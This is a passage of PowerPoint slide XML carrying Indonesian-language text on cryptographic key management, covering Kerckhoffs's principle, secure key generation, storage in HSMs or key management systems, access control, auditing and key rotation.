              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dijaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Prinsip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kerckhoffs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menetapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>haruslah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>segala</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuatu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kecuali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kuncinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diketahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pembuatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjelaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembuatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dekripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendekatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbaik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>industri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditebak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipaksakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penerapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langkah-langkah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengungkapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rangkaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karakter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alfanumerik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sederhana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>modul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (HSM) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (KMS), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mekanisme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teratur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memantau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengaudit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengubah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkala</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rotasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
